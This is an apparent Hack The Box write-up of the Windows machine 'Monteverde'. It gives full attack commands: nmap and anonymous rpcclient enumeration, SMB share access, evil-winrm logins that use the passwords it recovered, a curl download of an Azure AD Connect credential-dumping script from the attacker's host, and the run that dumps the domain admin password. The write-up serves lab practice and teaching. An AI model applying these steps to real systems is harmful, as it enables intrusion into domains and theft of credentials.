Monteverde - Hack The Box
Summary
Monteverde is the Hack The Box windows medium level machine. For the user part, we enumerate the RPC service to get some user names. With that user name, we connect with smb shares. In that share, we get a user$ share. User$ share contains 1st user credentials. With that valid credentials, we get our user flag. For the root part, we have done privilege escalation. We exploit Azure AD Connect to see the password in plaintext. Let’s begin exploitation.
Service Enumeration
An NMAP scan shows the following (partial) output:
Note: Read the command and flags explanation
- sC: To scan with default Nmap scripts.
- sV (Version detection)
- oA: To write the output file in the three major formats at once.
#Command: $ nmap -sC -sV -oA nmap 10.10.10.172
We found several ports are opened. We exploited the SMB protocol using the RPCClient tool.
#Command: $ rpcclient -U "" -N 10.10.10.172
In the above figure, We got some usernames after enumerating RPC.
Reference:
Gaining User Access
Smbclient is a client that is part of the Samba software suite. Some of them are already know all the basic commands of this tool. List public SMB shares with the command.
#Command: $ smbclient -U SABatchesJobs -L 10.10.10.172
The browse list shows other SMB servers with resources to share on the network.
We connect to the smb shares with the given command below.
#Command: $ smbclient \\\\10.10.10.172\users$ -U SABatchesJobs
After gaining access to the users$ share. We found one useful file i.e. azure.xml.
We downloaded this file into our host machine with mget command.
Azure.xml file gave us a password 4n0therD4y@n0th3r$. With this password, we can log in with an evil winrm tool.
#Command: $ evil-winrm -i 10.10.10.172 -u mhope -p 4n0therD4y@n0th3r$
n figure 6, we successfully login with mhope user and got our 1st user flag which is located in the Desktop folder. Now we will move toward privilege escalation.
Privilege Escalation
We see that the current user has group permissions of MEGABANK\Azure Admins. I search on google for azure privilege escalation.
#Command: $ whoami /groups
The Azure AD Connect service is essentially responsible for synchronizing things between your local AD domain, and the Azure-based domain. However, to do this it needs privilege credentials for local domain so that it can perform various operations such as synchronize passwords. We made a temporary folder to transfer the Azure-ADConnect script.
#Command: $ curl https://10.10.14.11:8000/Azure-ADConnect.ps1 -O rohit.ps1
Reference:
#Command: $ Import-module ./rohit.ps1 $ Azure-ADConnect -server 10.10.10.172 -db ADSync
When we run it on a machine that has the Azure AD Connect database on it, we get the AD account’s credentials in plain text. Again for the root flag, we try to connect with the evilwinRM tool.
#Command: $ evil-winrm -i 10.10.10.172 -u Administrator -p d0m@in4dminyeah!
We successfully login with the Administrator credential and got our root flag.
Thanks for reading.
Hack The Box Profile: https://www.hackthebox.eu/profile/116842
Blog: https://medium.com/@princerohit8800
VP at Bank of America | Senior Security Consultant | MSc Cybersecurity | Offensive Security Professional | CRTP | eWPT | eJPT | CEHv10 | ECSAv10 | Ex - Ward Solutions an Ekco Company
4 年Nice . Keep going ????
Blackhat & DEFCON Arsenal | Secure Code Review, Software Supply Chain Security
4 年awesome write-up ??